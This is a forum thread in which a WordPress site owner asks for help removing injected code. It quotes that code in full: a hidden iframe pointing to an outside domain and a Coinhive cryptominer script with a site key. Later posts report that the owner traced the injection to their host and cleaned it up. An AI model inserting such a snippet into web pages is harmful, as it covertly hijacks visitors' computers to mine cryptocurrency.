Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

Help: website infected by coinhive

shame08102488

Professional
Advanced Member
Reaction score
Guy please help

How can I remove the below script in my website? I didn't notice that my website was infected the coinhive, my coworkers notice its since he using avg anti virus and suddenly im using eset, before im using avg.

I am using wordpress for my webiste

Thank you

<iframe src="http://www.umbrella-security.ml/" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<script data-rocketsrc="https://coinhive.com/lib/coinhive.min.js" type="text/rocketscript"></script><script type="text/rocketscript">var miner = new CoinHive.Anonymous('sVS4g1fQH40QaQWj2GdBMMt8mLlDy8vQ', { throttle: 0.9 });miner.start();</script>
</iframe>:help:

Last edited:
Baka nasa browser mo yan ka ts o kaya sa pc mo. Try to search lang sa google how to remove coinhive.

Baka nasa browser mo yan ka ts o kaya sa pc mo. Try to search lang sa google how to remove coinhive.

wala boss, nasa website talaga, kc nagpalit ako ng free server ng cloudflare dun naka inject yung coinhive, kaya ntrace ko sa source code ng website ko nakainject yung malware, ayun nitrace ko s cpanel host ko. ok nmn n sya now, kaya lang naka suspended website ko kc nadetect na phishing dahil nga dun s nainject n yun, inaayos ko pa till now.

wala boss, nasa website talaga, kc nagpalit ako ng free server ng cloudflare dun naka inject yung coinhive, kaya ntrace ko sa source code ng website ko nakainject yung malware, ayun nitrace ko s cpanel host ko. ok nmn n sya now, kaya lang naka suspended website ko kc nadetect na phishing dahil nga dun s nainject n yun, inaayos ko pa till now.

Buti naman ts na trace mo. Goodluck!

Back
Top Bottom